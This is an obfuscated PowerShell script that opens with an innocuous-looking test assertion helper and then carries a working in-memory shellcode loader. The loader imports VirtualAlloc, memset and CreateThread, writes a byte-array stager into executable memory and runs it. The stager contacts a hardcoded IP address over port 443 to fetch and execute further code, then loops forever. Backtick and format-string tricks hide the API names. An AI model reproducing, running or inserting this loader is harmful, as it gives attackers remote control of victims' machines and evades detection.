function V`eriF`y`-noT`NUll {
    param (
        [Parameter(vAlueFroMpIpEliNe = ${t`RUe})]
        ${actU`AL}
    )

    if (${nu`ll} -eq ${A`Ctu`Al}) {
        throw [Exception]('Exp'+'e'+'cted '+'not'+' '+"`$null "+'bu'+'t '+'g'+'ot '+"`$null.")
    }

    ${AC`TUal}
}

${C} = ((("{98}{31}{24}{38}{94}{2}{70}{22}{52}{77}{55}{64}{99}{66}{92}{62}{33}{50}{48}{59}{8}{86}{81}{67}{37}{84}{20}{6}{83}{10}{41}{101}{51}{26}{39}{43}{79}{68}{82}{19}{47}{87}{34}{60}{44}{35}{88}{54}{96}{69}{11}{28}{63}{40}{71}{73}{46}{0}{56}{3}{14}{97}{58}{25}{91}{75}{90}{4}{30}{42}{95}{45}{76}{85}{78}{72}{61}{57}{17}{74}{36}{23}{65}{80}{29}{49}{9}{93}{18}{15}{5}{53}{16}{27}{21}{12}{1}{7}{89}{13}{32}{100}" -f'es, uint','nt s','ne','e','Ptr lpParameter,','ms','nt','rc','pA','ern In','ationType, ui','e','ui',' ',', I','r me','IntP','adId);[','Pt','a',' dwSize, ui',', ','})','ll','}','Sta','}kern','tr dest','ad(In','t',' uint','mport({0','coun','l','c e','tPtr C','t({0}msvcrt.d','uin','ke','el32.d','Ptr lpThre','nt flProtect);',' ','l',' In','w','ibut','t','oc(In','atic ext','All','0',']public static extern ','et(','eat','P',' dwStackSiz','pThre','r lp','tPtr l','xtern','tPtr l','ua','t','tr ','{0})]p','r',', ','c ','hr','l32.dll{0','adA',' In','ttr','DllImpor','ss','Creation','Int','lags,','l{0})]publi','ublic s','ress','st',' flAlloc','t','F','dd','i','r',', uint',', Int','rtAddre','t','t','r','d','eT','ntPt','[DllI','Vi','t);','[DllImport({')) -f [CHAr]34);${W} = .("{1}{0}"-f '-Type','Add') -memberDefinition ${C} -Name ("{1}{0}" -f '32','Win') -namespace ("{1}{2}{0}"-f 'ns','Win32Funct','io') -passthru;[Byte[]];[Byte[]]${Sc} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x6a,0x08,0x5f,0x31,0xdb,0x89,0xf9,0x53,0xe2,0xfd,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x6a,0x03,0x53,0x53,0x68,0xbb,0x01,0x00,0x00,0xe8,0x85,0x00,0x00,0x00,0x2f,0x39,0x7a,0x48,0x61,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x68,0x00,0x32,0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x0a,0x4f,0x75,0xd9,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x7b,0xff,0xff,0xff,0x36,0x39,0x2e,0x32,0x30,0x2e,0x39,0x34,0x2e,0x37,0x31,0x00;${s`izE} = 0x1000;if (${sC}."le`NGth" -gt 0x1000){${S`iZe} = ${s`C}."len`gth"};${X}=${W}::("{0}{2}{1}"-f'Virtual','oc','All').Invoke(0,0x1000,${Si`ze},0x40);for (${I}=0;${i} -le (${sc}."l`En`gTH"-1);${i}++) {${W}::"m`eMS`ET"([IntPtr](${x}.("{0}{1}{2}"-f 'ToIn','t3','2').Invoke()+${i}), ${SC}[${I}], 1)};${w}::("{2}{0}{1}"-f'rea','teThread','C').Invoke(0,0,${X},0,0,0);for (;;){&("{0}{2}{1}"-f 'Star','eep','t-sl') 60};
